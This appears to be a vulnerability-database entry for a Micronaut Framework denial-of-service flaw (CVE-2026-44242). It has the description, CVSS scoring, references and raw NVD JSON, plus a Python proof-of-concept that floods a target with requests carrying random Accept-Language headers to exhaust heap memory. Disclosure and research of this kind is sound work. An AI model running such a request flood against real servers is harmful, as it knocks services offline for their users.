CVE-2026-44242

Description

Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. Prior to 4.10.22, the bundleCache is keyed by (Locale, baseName) where the locale originates from the HTTP Accept-Language header. In applications that explicitly register a ResourceBundleMessageSource bean and serve HTML error responses, an unauthenticated attacker can exhaust heap memory by sending requests with large numbers of unique Accept-Language values, each causing a new entry in the unbounded bundleCache. This vulnerability is fixed in 4.10.22.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Micronaut Framework < 4.10.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import random
import string

def generate_random_locale():
    # Generate random Accept-Language header to bypass cache
    lang = ''.join(random.choices(string.ascii_lowercase, k=2))
    region = ''.join(random.choices(string.ascii_uppercase, k=2))
    return f"{lang}-{region}"

def exploit(url):
    headers = {
        'User-Agent': 'CVE-2026-44242-Test'
    }
    print(f"Starting DoS attack on {url}...")
    try:
        while True:
            headers['Accept-Language'] = generate_random_locale()
            # Target an endpoint that might trigger error handling or resource loading
            r = requests.get(url, headers=headers, timeout=5)
            print(f"Sent request with Locale: {headers['Accept-Language']}, Status: {r.status_code}")
    except KeyboardInterrupt:
        print("Attack stopped.")

if __name__ == "__main__":
    target_url = "http://localhost:8080" # Replace with target URL
    exploit(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44242
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44242
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44242/
[4] VulDB https://vuldb.com/cve/CVE-2026-44242
[5] https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-3rfq-4wpf-qqw3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44242", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:35.617", "lastModified": "2026-05-12T22:16:35.617", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. Prior to 4.10.22, the bundleCache is keyed by (Locale, baseName) where the locale originates from the HTTP Accept-Language header. In applications that explicitly register a ResourceBundleMessageSource bean and serve HTML error responses, an unauthenticated attacker can exhaust heap memory by sending requests with large numbers of unique Accept-Language values, each causing a new entry in the unbounded bundleCache. This vulnerability is fixed in 4.10.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-3rfq-4wpf-qqw3", "source": "[email protected]"}]}}